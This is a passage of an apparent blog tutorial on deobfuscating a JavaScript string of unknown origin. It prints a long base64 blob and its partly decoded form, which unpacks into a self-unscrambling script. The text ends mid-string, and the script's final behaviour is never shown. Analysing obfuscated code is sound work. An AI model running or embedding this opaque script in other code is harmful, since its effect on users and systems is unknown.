JavaScript String Deobfuscation

Posted by

A little while ago, I came across an obfuscated string which I knew was an input to a JS file. I did not know the deobfuscation algorithm, the JS file or information on what the string could represent. Essentially, all I had was the obfuscated string. In this article, I describe my method for deobfuscating the said string.

Obfuscated String

IksyaVoxYm1OMGFXOXVLQ2w3Wm5WdVkzUnBiMjRnVnloWEtYdG1iM0lvZG1GeUlHVTlNemd4TURrNU55eFFQVmN1YkdWdVozUm9MR1k5VzEwc2JqMHdPMjQ4VUR0dUt5c3BabHR1WFQxWExtTm9ZWEpCZENodUtUdG1iM0lvZG1GeUlHNDlNRHR1UEZBN2Jpc3JLWHQyWVhJZ2NqMWxLaWh1S3pNd05Ta3JaU1UwT0RZek9DeDBQV1VxS0c0ck1UVTRLU3RsSlRNeE56VTNMR2s5Y2lWUUxHbzlkQ1ZRTEY4OVpsdHBYVHRtVzJsZFBXWmJhbDBzWmx0cVhUMWZMR1U5S0hJcmRDa2xOamN3TVRVek1YMXlaWFIxY200Z1ppNXFiMmx1S0NJaUtYMTJZWElnWlQxWEtDSmpiMk52ZDNKbVkzUm5hblZ5Ym5oNWNIVm9aR1YwYkhKaWRtdHZjM050ZW01MFlYRnBJaWt1YzNWaWMzUnlLREFzTVRFcExGQTlWMXRsWFR0UUtDSWlMRkFvSWlJc1Z5Z25ZV2RvSUNBOUxqWTlhVGt5TVc0OWJ5Z3VaMTExYkN0dlhYSnZkMk5rYVRodmNqdDBjMk5oWlhaZGFXMDNiblZiY2lrNE95aHpZVjF5SUZzOVlteDBaQ3h1YmpCYmRtMHVaRGRwWVNodVlYWXNMREFvTEhKMmRTaHljamdwTEdrMUxHNTJPeWxwWnlCbExHMG9iMnhzTEhZd2RDZzdMSFF3Y0dOc1lVRmhLRzVvTEdsbWFGdG5ZM0ppTjNZdUxHNWxiSGhEYkc5NmJ6MW5iMXM3YVRsMFd5RnljRnNyUFhNOWRqc3dQVEVyWVQxaFBXZHpaVDF2TEhJMFhXOWRJWGh6T3lrZ1l5SXBhbHRuZEdWeWNudGhaRzlrWVdGeWJpdHRhR2hpWWk1cGNEY2dkRUU1YmlJdEtYY29jbkpoY25KaFBYUmliWFZEZEQxcFlUWXVMaWxqS1NsMWNpdGhNU0ptTURzN1ozSnlQbVZoZGoxMFF6dHJLMm90YURzeFpDQnFaM0IwTFdnb2FHaGtJRDFsZER0c1pUMTJiSEpUWWpFcFEzSnZPM1poTENCbmJTdHpLRDB5UFgxeWIxdHVLanRvY3p0bGJDMDdQU0IyWmloa1l6WnVhVHNySUhKN2FuSlRiREZ1Y25ObmN6dGhPMjVqYXl0eWFuUmxaek55YmowaUxsdHhZV3dnYjNVZ01HTXljbWs3YlRBOVBURW9aVjFoWmwwZ2NpdGpPM1JoZXl0dkxXTnVNelFyT3lCb1ltUkJkaTVoWlQxaWJtOW1kQzU3S0NBeFozTTdLVHNwYkRGcGFpMDVkSGN3TjJabWRtRXBOV3hoZlRzb2JtWjlZU0puZEdnM2RTc3lMREp4UFRzOWRteDJaWFE3V3loME95bGlMbUlvSUNBN2RUbHFjSFk0TUR0Mk1qYzdhWEkyY0N4eWRXa2diamM0TEdkalBYdGplVGtzY0hCbE9EMHBiR1k3UEQxME8yZDFOR2R6UFNzeE96WWlLRHNzT0NrMmMzSjlkblZsS3oxaWRXTTNkQ2d1WW5ON2J6MWRLU2xvYXk1RGNqczdPM0poYUR3cGFUWXNQV2R5SzMxaklGMDVLQzRvYVc0OWJDc2dLR2hoWkdGbU1YQm9MbWwxYzEwMlppNXpjanRxZEd0cExEMWtLeWtvTUhKaWNDNWRZeXR2TW1OdWJ5STdQQ3BuS1hJMktUaHljMnh6S0RBN2VGMDlkalJ5UFRWMVlTbHZRMmx2S1dWdmREdHZZWEpsWVQwdVBTbHlLRFoxS0gxbFBXRXNaM0p3ZEhJOFd5Z3piajFwYUNKNktYWjJQVnRiZG13b08zSXBjRzltYW1weExDSXlkVU51YkNoaGF5c3BhWDB1ZEhKRGRuWnNJR1k5TGk1N0xYVW9JQ2x6Tkc0cGJ6SXJhUzVkZG5jdUxtVnVZanM3Ym5ONkxHTXNPMk51SUNoMUtUNHJjaXQ0Tml3cmRTSnliaWxsSUNobWJtSm9kR2M4S0d0dWNXNWxLU2xoYmp0eUxDNTBjbVUzZDI5dWNHd3JiV1YwTVNoQkxFRXVaVFoxYkd3NExtRW5LU2tvVnlnbk5HWlhabTh4SVZkc1pHVjBVU1E3Y0dKdUpDUXBLU2xtYkRBaFUxZDFWMlZsWmtOcFkxaGZaanM3YjE5Vk5EMHlYMWRtWFdGWFp5Z3VLREU3T2oxMVoxOW9LV1VnS0NSemZUczBmVEpYSlZjdVYxZDlJbUowSVZkWFZ6UjVXMUJYWHp0eVhYRTZOV1ZsZkZkcFYyNWNKMWR5V25ReU1ETjNYUzRnV1NWT0lHSXBlVmNrTGlRMktGZDdmV1JsYkc5WFhWQmliMWRxZXp0RFZ5QW9aaTVkTENKZktDNW1iM2x3S0hWWE1EWjFWMnBYZldabGIycFhkQ0ZYYW1OaVYycFFiaUV1TGlNZ2RGZzJYWE1nYWlGc2ZTQm1ZajAyWFZkc1pXVXNLVmNvS1dWREtWZFhLR1JYY204Z1VGOXlLVHB2WTFCeWQxUlFJVGhkTlR4WFYzSlhJQ2twWVgxZlpXTmxiaVJYT1ZkamRHVXBNellzTkM0d09XeDlWMkZsZFc5d01HSXBLSHQ3TEdNcFYxZHlhaTR1WVhwbFpUY3VSV3A5VjJSWE8xUlhlRkJYYmw4M1pTbG5hbW80WlZjb1pYMGpkWDFUVjE5b01TNDZZaWxQVjNBa0tEVXNWeWxmWFNCWFVHVTlkU2xsWlNCME1HUjBMbU1vVjFBb1Yyd3FhU1JuVjJZb0t6QmZkelZYT1dkWFVGYzlkRGN6TEhVa1YyVnVaaVJ6WHloWFpWOW1QU0FoWHlVeFVEQmlOVmR2VnloU1ZEMGhhVDF1S1drcE9UVXBVRmRYY1NrM1UzMWRWMlZiUFZNNVZ5VWdMbWRYZURBdWZYSjdWMGhYVnpWdVZ6WjBMbE1zTVdWdloxdG1ObFFvWkNra0xDQlhjbGRsTGw1Yk9UWjdjakVrZWowc0pIUXpWeTh3TkZneVYyVmRQMlVvWldsUU1GZFhMbUZ1S1VRdVgxZDNRMU5PZTJKWFYycFhYM1I3TmowMmRHNWZWMjRvZEhBMWZYMXVKVHNzSURRZ0pDNHdXMlU1S0haMEwydGtMeUJwWjFCalppNXFZMTlsVjFBeWJWQnFZbVloVjJweklEMVhaV1pmTmprdUxEazdaR0ZwS3lsN0tWZFFWMjh6S0c0cE5TNWlmVmNsWkZjcGJpeFFORFFwYVhKM2FsZENablUwTlZjdUx6QmxaV1JYS1d4dVVtazdjRmR2WFRVdFYyTm1YQ2RRUm4wd1Z5Rm1VM013VnlrbGFDaG1WM1ZOSzIxbE1pa29WMlV2VnlBZ0tIVWlZbXBmWHlVa2ExOVFNRU51SlRBb1ptVTlWMUZqZERKdk1tZHZLR1ZRTW13eElGZDliaUYxWm00N2JsMVhOM2RpZTJrNFBWOG9WelU0TjNZbFhTRlhYMUJ4ZTFjeExpbDFKRmNzVzJSbUxYVnRaVjlYZEZjb0tHWXFYVmNsU2lWdlYycHpZWEpES0RobFpteGRaWDFKUkhRdVZ6MWlLVVJYZWxkWFgzRlhJemtnSTNCdGFpVnVjM0E3Ym5WY1hHeGRWeTQ5Vnk0N05qMVhmUzU3SlY4L2NDMVhabTQvYkZjZ2JXOXFWMmtvT1NGWGZTSnNabm8wTG5CWExuSXFZbVZmYkY4dUxtRWdXMUJFSVh0UVZ5bGZibVZ4VURkUVZ5WWtVRUo3YURNN2IxZGhWMWQ3YVc0ekkyb3JWeVYxSkhSMUlrTjVMSEJxYjN0WE96QnBaU1ZmTVNwWElURXlha0lwTUdreFpWOHlWekpGYmpCd0tXUjlPeWxzYVZkcUxqQWdhbjBzVTI5aExGNHVYMTA3VUZkcUlqQXBMakk1TzFCdlYxZG1LUzVYS0R0N1NpaDNiakpRVmxjb0xsQlhJRmQzTlYwNWRGMTlWMjlkWFN4eVZ6RjBhVjluWDE5WFBUMVhhUzVRVUdsWFYyTlFaaWtvVnlrMVZ6VW9MelV3SmxkTmZEZHlLV3N4ZXl4UWMxMXVYeWtzVUY5M1hWOWxkRmRYWlM0b2FWQWhLUzVrVjJJNFptOVhhblZYVjFkUUl6ZG1VRFZYWFZjM0tDRXdiekJjWEZkNU1pQjRNWHRGTVRFaExtVmhNQ2hoTVZ3bmNsdG5PeXhYVnkxdGJXa21VRkJRV1Y5cWFIMWZZamhuT1ZkWGNpeDNWMWQ3WjJaeU9YUWtZVjh5S1VWcFVYVlhLRFJ1TVdwblhXa3NKU05jWEh0cVlUZFhXMWNtZEZjL2V5NDJJU0ZRVUdWWFpDbFlNU0JsT0MxMllWQm1MRmNySWlsMFpXZDdmVzRsTEN0eUpHRmRNajh6WmlrN2QzVWxWMjVYTVc5OVpTaHZNU0pYS1hWWEtHeHViV1ZxS1Nrc2FtOWZPRElrTERWcWRFMVFleVFwVnpsMGFtNDljMkU3WVNFcEtGY3pkMlVsZFhCOWZHVnNYemhkZTNwbFVHcFFVeU11S0dkY0oyVlhPMkVsZGswd1lWZHZNRFYwZDJSZE5GZFhWM0pYSUROWGRDQmtMRzh1SkdsUU5FbFhZM1Y3VjFkWFVDazVWek1vVjNSSE4xY29ibmRxWldndVZ5NXBmU0JYS0d3OVptOHdlMjRzWVM1WEtXWW1aVEZxYjJZbGRGQmhaQ3hYYzFkMk8yNWZibGRKTGlCMVVHcHZiR3BxVUZVa2VuSTBNbGRwWm1WOFhWY2tmWFJYYWlWZFYxQWxaQ2xYTUZkWFYyUWxQbVZxSUdrcGRIcE9jeUp5YVhvM1VGYzNNbkl5Y21KTFJTZzRkQzAyTlRaT1Z6Y3FYV05zTDJZbExHWXBiRHR6UEYxbWNDMVhWMjVkWVZjeU9TNG9WMjVYVW1wZFhTbG5JRFk5WnloaFpWOXBkRTFYTEdsMWFuVlhkMlpRZXpOWFYyWlhWeXd5ZVhjcE8ySXhMRmN2TVdNbElDQmhVQ0F1WWxBelkydGpNSFZtTGpOc1YyVlhlVmRkZFdkWFYyNWlJQ2xYVjI1dVhYTmpOMWR0TG1Fclh5Z2lMbXB0VG1Nb1psdHBMbVZkWDNVdWJtVXNYMlVwZEZkalZTa3NaVmRkUmlCWFZ5Z3VlVEZYSUdsZFYxY2xWM3BkVjNWZE1GMDROaTVxVURBck9TeGxZMlV4TGk1ekxsY3NKR2xqVjJWd09Ed3pKRjlpTGlVck1qVmZYV1ZxZEhsYk4yRWdLVFl1Wm1wOUpIMWhmVmRYS0d4WE5rUXhZVzlsVnlRcFRTSTFPMnBYTkdvdWFWd25LR3dvUmxZMk0xQlFWelZYSlhVcE55QmxVQ0FnTGk0cGNYdDlkRTRwY3lnN1pTWWxaREE0YkV0cVd5NDVMalFtVnlGbVYyVThaaUJ4YkRacFpsQmhVRFZpZTMxMlVEVnlaeTFzSkM0Z1JtVm1WMU5YYW5CbFkxZEZSV1VsSkh3cFRtWlhPMkZsYm05ZlhTUlFjbTRzWm5vcGFWOXFYVmRxTGlRZ09EbHlMaVZmVnlKb01XbFFhU1E3YmlreFVGZFhmREVpVnlZbExqSnFjRGRNWlhRelZ6VmtaR0VtZFM0eGVueDVaRmQzV21wWFZ5bFhLR1o0SUd4d0xtRnJiVGxsTmw5cVBTNHViaVU3SWlodmQySmxWRkJ2Y2xBcE0xTlhSV1lwZTFkWGJWMHRWMWRYVjN4QkkyZHljaWg5Skd4WEptSWxaRmRxTzJOZ1Z5cFhhaTVpUVdnd2NEMVhJREJRUVdwbEtYSlVTVmRsYlNobWRYY29YUzVRWmwwa1YybHdNemtwTTF3blZ6QXVWMlp2VnlWaWNDeGxJU0ZLVjExM1ptWnNjbWtwVnl0cFYzSlhPMTlYYmxjcE96QlhlbVV4S0NJN1l5NVdLRE43Vnl4MUlEaFFhbUUzZVM1WFFtNVhibGRkS0c1dGNubzBWeWtyT0dabU5sODJPMms5TzNRdVkwVXdJV3RsZlNsZlh5aGRjR0Z2VjJWMWRHNWRWeWt3YWxkWElHb3NYV3MyYVR0N1lsZE5NUzVkTG1OZll5UlhReWhJYjI5YVgxQmZNMEI3VUNnN0tTNU9abGMyVjNWN0sybG1ZMWN1TjFjelYzQmZWbWx3TG0xUVgyWTJKV1FxSVhRcElGY3NYMnBqZGp0WFVGY2tZV0V1WmxSWFgxY3VaV1YyZTMxcUpISWxVR29qYjNwUWZXNVhMaVpmVG5jd0lIQnZMbmRmYVZjN2FsY2pOVjlRTG1aWFgzUjlhamxoYmlJb2RUVjdaV3hUZUZveFFHZDBNVjl1TmxjN05GZGpWQ0ExSlZjc0pTa2dJR1lnTkhabExDbHBYMTB1V3lZb1gxYzdaWDFYYWxkUUtGZG5LQ01wWmxkN05XVmJJVHNnZTBRdWIxUjRLbmgxWVRraUtWQWdWMWRYTlM1WFpsY2tOVFpkUDI5bFBXZFhjMzBvY0gxaEtYTjdYMjVqTjFCWGREQlhkM0pYVjJVeklIUTBMbWNzSUVGeWFWZG1aU29oZEcweFVDaHNkR043UFdadVoybGhaU1U5SURVbFd6MThiemcyTG00bWR5ZzNiU2tvUFRaYlZ5MTdhU2x1VUhSWFptb3lKVmMzYzFkbFgyOXBiazAyVjFkbU1YbG1JbDg1VjFkUWNtNWpkM05oSlZjb08xaFFLQ0JITENsME5XNHBjRmN4TXpSWFhYRmZPR3dwS1hzMmNISXVVR2wzYVcxd2UxY3BkR29wTVNoZGRDcHNYekVsTER0eExEQnlabDlxVjI5WEtTbG1lek5kWHlsUWRDaG1hbXhjSnlGWGF6VTdMeVZuY1RKWFp6TXBaU2c0VjFOWGVXcFhURjVmTkdOWE9HbFhJWHRZVzFkdWVXZ3BRMm9zYVdrdExuSTdZaVVySldOYVYzUTFJUzR4S0Nsa0tUaG9WMTh6YVhScElDNGdhbVlzVUZkWFZsZHFJaUF1YVM0cFZDTTJaWHN3YWlGdktHVjNjM1EyVjFkY0p5VjBMaWgxS0NReE4wUmlialEyY2lneWRFMWRVRFlvVnpOak0ya3VjbGRWZEZkUUtXbGRMMjhvTkZkWElpMUtJenRYZWlnN1YxQTBYejFYVjJaWGRGVjBSU3dsZVdwbWJTRXRJSElsVnowd0lrbHlaaXRuTVRkdFVGY2lLU0ozYVNoMElHVnlWanRkY2k1cVpESmtaU3dsTUZCdllpbHBZaWxRYlZjN2NuQmpiWDFYWHpGWFhWZHFZalpRVnpKek9HVjdWekF5YVdwWEtEUmxkRmMxVnp0amRHNWRYVmNtT0ZjMFppdzdiV0Z0ZEdVMmNEMVhXMWM1UzJWWktXa3hLRHRYYmwwbE5EUnFaVGhsSUdaZGFTRnZkeXhkZEZkc2RDaFhkR2xRTzJZcFYxODljeWxYTEgxOWFXeDdVSEJRSkhSbGNWZDdMbWtwTDNCcVgzVjVQV0kxVnlGWFYyVjFkVWNnZGlsMGJFNXlMa1ZpTlZjemRXZFhZbDhvVERaUUxDNXhKU2xYWVhSYWJtVlhZVmRsZTNCeUpIRTBJbmRpWFdVdWN6WjNVR2t1TUdKdmR5Vk1jMTl6Ympzd05YTWlYMTEzTGlraGRHWXVLSGRkVTJnaFl6QmhOenN1TjFzb2VpQXBJVzVYWENkdEtTQWtibGRYZENrcGNDVlROeVV1TUh3dVNXNTBleTVtS1ZsWE1sOXNabDBvVnlCMGRYSnlJRmRwZEhKWGRIYzFPR0Z6VUZ0bFNpRXdKSHBsVjFjc2JETTNQbGRYZldaZGFTaDBOU3RrY3pOWE8zSmZWelVvUFdwbUpsZDJOV2twTXlobFYzSXNjRjhqS1ROWFptRXhUVmRsSW5zaFlXUmhQQ1YxUDI1WEpXRXVQWFJwTG01bUtDNDRibVZtTzJSZEptVjFQbEF1Y21sa015RXRVR0Z0S1hNN2MwUmJVQzRvVnpzelhXcHBOU0JQZEhKdU1DRmxaMlZqZFNsWGRHVWpKV1Z1WnloNFlYVTBKV0prVjEwcFkxQlhlMjV6Ym1wcmFDbHFaV05tS1hSbFppeGxibWRxYml4aUpWc29hV055TjNNamFUSTJOR1FnYVNreFYzb3hSV0V4ZERaYmQzSjlMbXB5VjExWGIyWndjMjkwWkNodWIyd2pJU0FwTWtWelNHZ29iMTA5YzJWN1FHSTFaWFJYWW5OZmVucHdMaWc3SUdWS1YxOWRZakJjSjJra2FtWmhMR1V1ZFdaU2RDVTVWeUJRYkhnN1hXOVhYVkJ1ZENBa1lTQTBMbGR6T0h0aFpISkRLRFJEWDJGaFVDSndQVEJtSkZjeUpGZFFWek1zTWxFd0pGQjlVRmRYS0NWeVVHZDJMbXRUS1M0b1YybHZiMTAyYW1vN1VDRmhJMUFwZlRodVBWMWxjalpoWnpKUWFpNDlKR1ZsTGk1bFpsY3hQMTloTXpFcExtcG1ZWDFsTGw4emZTNVhYelpkT0M1aktEVndNU1pwS1Z0MFVDbGJWMWQ1ZHlrc01DQndkMjloTm01a00xZGRPU2tnUFYweFYyQmxYeVJYYW1VaVZ5UW9JbVZ1SUc5QVlXVlhZbmR6WlZkOU5WZHVPRmNyWlc0aUtHVWxNQ1ZpWlRVcFowQWxaV1pqSVQxMFlYWm1aanRYYVZOc2Jpa2xLR1VwZDNJdVZ5azFJVmN5TUdveFlWY3BVQ1U5WTFCNExtMVFYVEVvS1VwUVhYSTRLU3AxWFN4d2NUY2tWelF3VnlndlpUZHJPbkk5S0YxdVUyNVhYVGd6WFNrN2ZITjBPeUVoZDFkME9DaG1kMmx6Wmx4Y1hUQlhLVE51WDNOMmFWMXVkVGhRTG1KeWNpNWROeTRwVUZBdWNuWndWMlZYWkdjNExDaG5MR2syTzFkN1lXSTFKU2h6WFQwb2ZTaHBkV0YxWXk0OVYxNDROWFlvWVNobktWY2pYMkl1VnpkbVl6WXVhbWtzWFc0a0lTZ3BWaUZYS1VWcU5tTnRiVzVYYmpJd0tGQlhhU1ZtWUQ5ZmRTbGZWek5sT1RBa1YxMWlLVkJxY3pJMVJWZGxQVzkwVURSbE0yYzdkU1VsZUhNM1YySlBObEJYZTJJemJpbGpNaTVYSUYxek1WQlFWeWc4VnlRNU16QThha2c5VjNjaVYzSjBaaWxYVGlCZFYyVTJJekE1WXpCRVBGMGdWeVl4WkdZeFVDQnBmR2tvZXlsWEl6azRWelJkWDEwdFYyOXZYVjBwYmpGdlJXb29JRkJYWHlnMUlpVmhNRDFGT3k0L2JIWXdJakJwZXpaUU1DNTNYU1F3SVZkWExWY3VLVmRRVnl0bmJpd3plRmNzVjJaa0xqMTdJR1ZYTG01eWJYMHhMbGRmWVZkWFhTaHNOaWxYZDFjemFuSndJRGcxYkZkcFYxOHNKaXhxYlRRMUtERXVYQ2RoVjFVME1DaHNiMTluS1d3ME9DbGRYM1F1VnlraFYxZEZSU0JRWmtsWEszdHhabk55WkZOWE1GZHVUaVF6Zlc5WEtWZGthbVpkTWl0bFpUWlhWeWt0S0dWWGJIUWdWMWRiTG1rMmJsZHVWeTVwS0dVNUtGY21iRmRkVjJGWE9UZ3NJMWR1S0dZOU5ESWxPVk5jSjJWclpUZE9LVjltVURjN2FpZ3dVR2xrVjNSbFZ6VnZLRjBwWkRKZE5YazliRWtvSVZjN2VTQXVVSFU3ZXpOZGIyWnVLRE1rZlRobU4zQnphbVpzTG00dGUyb3NVMjhrVUdWdGFYMVhWMXduS1dVMEtGTm1Wekk0Tm1ZZ0pUQmxjR01wWm1SeWNXbHZZWEVvTGw5MVgyTlhYM2x2TGxkd2FUWlhMbGRkS1Nrd2RTMVhiSGdzS1ZBbUtTNXFLV05kYzJVb2FEWXVleTVYUkZ4Y1lURmROMlowWlR0elUxZFFJRmNvTW1JdUpHVWtJM0l6TENod0lIdG1LUzR4WFY5eEpWOWthVEUyT0doWFpTNWhlSDFtZDMxbFYyOXFkeWxYVTJ3d2RISlhjeUJzZlNWbWNHSm9ielVvTTN0dlhVTXlManM3YTFkaGVWZG1TVTV0YVhRdWNGZGpMbEFvYjJWUVgyRTFZeTVYWDJCcEt5WTlWMjh1Y25KcGMxZDdVRHBYSlNCVFpuMWxMbTFzYkRaWFYxODFVSFEyYVQxWGJsY3VJR1U3VjJsWFZ5QW9leUEwVnlNdVhXWlhLR1pkYkc4eWFsYzdNMUF0S1gxMExsNTFLR01nVTFkbllTNWxMbGQ5S1RWa1YzUlhJU2hRTUdJcE5YQkVUaWxzVjNsd2RXRmpJVFpYS1NrdVVHSTNhakZ2Wm1saVlrZHNZVmRyTTFCek1TQmhMRFFwWWpSeWFtUlhVMlZ0SlNsd2Vta21LVzgwWm1VN0xtNVhmU2tqZlhobktIUjdjQ1JMYmxkaWVqTkpJamxYVUN3MlcwNW1YMlpuVUNrd08wTm9VRmRYVUdvbVppNXVMbUptZWoxZFVDTmZYemQ3WENkWFZ6RnpmU1ZkWHlCWEtVazlJVGcyT0ZkOWJEQnFWMTFmWlZkaWVGZGRZMlJmVUZkWFYyRXBabWNrVUc0N1BXSmRWMTh3UFYxWGVpQWdWM1JYWldJa2JWQnVibVZ4VjE5d1gyZDVOekZkVnpNZ2ZGY29aaVZ6TlNsMElWZGtiU1l1Y25GMFYzSWdNeTlkU1dOVFoxOVhka1o5VUU0K0lGdGlOV3BsYWlSWGRtWnFkelV0VUd3Z1YxZDBWMTBnVnpOZmNtWmZWejAwTTExZFhWZGxOeUVvY1YxcVYzMXdhU2dwZENndVYxMVhkMUJYYkZkNVYydzJQUzVRVnk0Z1hXY3dJUzVYWVc1MFYyTnNhVFZxTFZ0OGJIZDdaVGMxTzJkdlYxOVFkRmNwWWpRMllWY3lWMlppWmlCbGVXWmRiU1JYWmlCb1YxMXFNbVY5Vnl3cExHZFhLSEJqWVdvMVVDdHdibGMxTlZBcGNDQXVjR0p0WnpGdmNta3VOaVJkTkRkWFZ5bDNlQzVUTXk1bVkyMG9MbXB5VUdvNE5WY2dXeWw4WlZ0cFZ6UnZZWG9wY2laWGJGQmxJRUY3VjJFdWJXNVhJRzlYS0Zkd2ZYVm1aU2xYTGxkZlYzSWxQVzhoTjMxWGFtaHJJU2hxSURseWFURXpLelp3Wlc4b09WODJkR2RYVjI1NGUyNTlYV3dvVnpjb0pUWTNZbDhpWDE5ZE5UTjlPRHNoSUNseUttNTJNVmNtY0hSd2F5bEpaQ2xsT0NodWRWZEpNRmM5ZldaMExqZDBMbXhtS1RaWFZ6VnJZMUFuS1NrcEtETTFPVGNwZlNncE93PT0i

Deobfuscation

base64 Decoding

The character set used in the obfuscated string suggested that it might be base64 encoded. On base64 decoding, I got the following string:

"K2iZ1bmN0aW9uKCl7ZnVuY3Rpb24gVyhXKXtmb3IodmFyIGU9MzgxMDk5NyxQPVcubGVuZ3RoLGY9W10sbj0wO248UDtuKyspZltuXT1XLmNoYXJBdChuKTtmb3IodmFyIG49MDtuPFA7bisrKXt2YXIgcj1lKihuKzMwNSkrZSU0ODYzOCx0PWUqKG4rMTU4KStlJTMxNzU3LGk9ciVQLGo9dCVQLF89ZltpXTtmW2ldPWZbal0sZltqXT1fLGU9KHIrdCklNjcwMTUzMX1yZXR1cm4gZi5qb2luKCIiKX12YXIgZT1XKCJjb2Nvd3JmY3RnanVybnh5cHVoZGV0bHJidmtvc3Ntem50YXFpIikuc3Vic3RyKDAsMTEpLFA9V1tlXTtQKCIiLFAoIiIsVygnYWdoICA9LjY9aTkyMW49byguZ111bCtvXXJvd2NkaThvcjt0c2NhZXZdaW03bnVbcik4OyhzYV1yIFs9Ymx0ZCxubjBbdm0uZDdpYShuYXYsLDAoLHJ2dShycjgpLGk1LG52OylpZyBlLG0ob2xsLHYwdCg7LHQwcGNsYUFhKG5oLGlmaFtnY3JiN3YuLG5lbHhDbG96bz1nb1s7aTl0WyFycFsrPXM9djswPTErYT1hPWdzZT1vLHI0XW9dIXhzOykgYyIpaltndGVycnthZG9kYWFybittaGhiYi5pcDcgdEE5biItKXcocnJhcnJhPXRibXVDdD1pYTYuLiljKSl1cithMSJmMDs7Z3JyPmVhdj10QztrK2otaDsxZCBqZ3B0LWgoaGhkID1ldDtsZT12bHJTYjEpQ3JvO3ZhLCBnbStzKD0yPX1yb1tuKjtocztlbC07PSB2ZihkYzZuaTsrIHJ7anJTbDFucnNnczthO25jaytyanRlZzNybj0iLltxYWwgb3UgMGMycmk7bTA9PTEoZV1hZl0gcitjO3RheytvLWNuMzQrOyBoYmRBdi5hZT1ibm9mdC57KCAxZ3M7KTspbDFpai05dHcwN2ZmdmEpNWxhfTsobmZ9YSJndGg3dSsyLDJxPTs9dmx2ZXQ7Wyh0OyliLmIoICA7dTlqcHY4MDt2Mjc7aXI2cCxydWkgbjc4LGdjPXtjeTkscHBlOD0pbGY7PD10O2d1NGdzPSsxOzYiKDssOCk2c3J9dnVlKz1idWM3dCguYnN7bz1dKSloay5Dcjs7O3JhaDwpaTYsPWdyK31jIF05KC4oaW49bCsgKGhhZGFmMXBoLml1c102Zi5zcjtqdGtpLD1kKykoMHJicC5dYytvMmNubyI7PCpnKXI2KThyc2xzKDA7eF09djRyPTV1YSlvQ2lvKWVvdDtvYXJlYT0uPSlyKDZ1KH1lPWEsZ3JwdHI8Wygzbj1paCJ6KXZ2PVtbdmwoO3IpcG9mampxLCIydUNubChhayspaX0udHJDdnZsIGY9Li57LXUoIClzNG4pbzIraS5ddncuLmVuYjs7bnN6LGMsO2NuICh1KT4rcit4NiwrdSJybillIChmbmJodGc8KGtucW5lKSlhbjtyLC50cmU3d29ucGwrbWV0MShBLEEuZTZ1bGw4LmEnKSkoVygnNGZXZm8xIVdsZGV0USQ7cGJuJCQpKSlmbDAhU1d1V2VlZkNpY1hfZjs7b19VND0yX1dmXWFXZyguKDE7Oj11Z19oKWUgKCRzfTs0fTJXJVcuV1d9ImJ0IVdXVzR5W1BXXztyXXE6NWVlfFdpV25cJ1dyWnQyMDN3XS4gWSVOIGIpeVckLiQ2KFd7fWRlbG9XXVBib1dqeztDVyAoZi5dLCJfKC5mb3lwKHVXMDZ1V2pXfWZlb2pXdCFXamNiV2pQbiEuLiMgdFg2XXMgaiFsfSBmYj02XVdsZWUsKVcoKWVDKVdXKGRXcm8gUF9yKTpvY1Byd1RQIThdNTxXV3JXICkpYX1fZWNlbiRXOVdjdGUpMzYsNC4wOWx9V2FldW9wMGIpKHt7LGMpV1dyai4uYXplZTcuRWp9V2RXO1RXeFBXbl83ZSlnamo4ZVcoZX0jdX1TV19oMS46YilPV3AkKDUsVylfXSBXUGU9dSllZSB0MGR0LmMoV1AoV2wqaSRnV2YoKzBfdzVXOWdXUFc9dDczLHUkV2VuZiRzXyhXZV9mPSAhXyUxUDBiNVdvVyhSVD0haT1uKWkpOTUpUFdXcSk3U31dV2VbPVM5VyUgLmdXeDAufXJ7V0hXVzVuVzZ0LlMsMWVvZ1tmNlQoZCkkLCBXcldlLl5bOTZ7cjEkej0sJHQzVy8wNFgyV2VdP2UoZWlQMFdXLmFuKUQuX1d3Q1NOe2JXV2pXX3R7Nj02dG5fV24odHA1fX1uJTssIDQgJC4wW2U5KHZ0L2tkLyBpZ1BjZi5qY19lV1AybVBqYmYhV2pzID1XZWZfNjkuLDk7ZGFpKyl7KVdQV28zKG4pNS5ifVclZFcpbixQNDQpaXJ3aldCZnU0NVcuLzBlZWRXKWxuUmk7cFdvXTUtV2NmXCdQRn0wVyFmU3MwVyklaChmV3VNK21lMikoV2UvVyAgKHUiYmpfXyUka19QMENuJTAoZmU9V1FjdDJvMmdvKGVQMmwxIFd9biF1Zm47bl1XN3die2k4PV8oVzU4N3YlXSFXX1Bxe1cxLil1JFcsW2RmLXVtZV9XdFcoKGYqXVclSiVvV2pzYXJDKDhlZmxdZX1JRHQuVz1iKURXeldXX3FXIzkgI3BtaiVuc3A7bnVcXGxdVy49Vy47Nj1XfS57JV8/cC1XZm4/bFcgbW9qV2koOSFXfSJsZno0LnBXLnIqYmVfbF8uLmEgW1BEIXtQVylfbmVxUDdQVyYkUEJ7aDM7b1dhV1d7aW4zI2orVyV1JHR1IkN5LHBqb3tXOzBpZSVfMSpXITEyakIpMGkxZV8yVzJFbjBwKWR9OylsaVdqLjAgan0sU29hLF4uX107UFdqIjApLjI5O1BvV1dmKS5XKDt7Sih3bjJQVlcoLlBXIFd3NV05dF19V29dXSxyVzF0aV9nX19XPT1XaS5QUGlXV2NQZikoVyk1VzUoLzUwJldNfDdyKWsxeyxQc11uXyksUF93XV9ldFdXZS4oaVAhKS5kV2I4Zm9XanVXV1dQIzdmUDVXXVc3KCEwbzBcXFd5MiB4MXtFMTEhLmVhMChhMVwncltnOyxXVy1tbWkmUFBQWV9qaH1fYjhnOVdXcix3V1d7Z2ZyOXQkYV8yKUVpUXVXKDRuMWpnXWksJSNcXHtqYTdXW1cmdFc/ey42ISFQUGVXZClYMSBlOC12YVBmLFcrIil0ZWd7fW4lLCtyJGFdMj8zZik7d3UlV25XMW99ZShvMSJXKXVXKGxubWVqKSksam9fODIkLDVqdE1QeyQpVzl0am49c2E7YSEpKFczd2UldXB9fGVsXzhde3plUGpQUyMuKGdcJ2VXO2Eldk0wYVdvMDV0d2RdNFdXV3JXIDNXdCBkLG8uJGlQNElXY3V7V1dXUCk5VzMoV3RHN1cobndqZWguVy5pfSBXKGw9Zm8we24sYS5XKWYmZTFqb2YldFBhZCxXc1d2O25fbldJLiB1UGpvbGpqUFUkenI0MldpZmV8XVckfXRXaiVdV1AlZClXMFdXV2QlPmVqIGkpdHpOcyJyaXo3UFc3MnIycmJLRSg4dC02NTZOVzcqXWNsL2YlLGYpbDtzPF1mcC1XV25dYVcyOS4oV25XUmpdXSlnIDY9ZyhhZV9pdE1XLGl1anVXd2ZQezNXV2ZXVywyeXcpO2IxLFcvMWMlICBhUCAuYlAzY2tjMHVmLjNsV2VXeVdddWdXV25iIClXV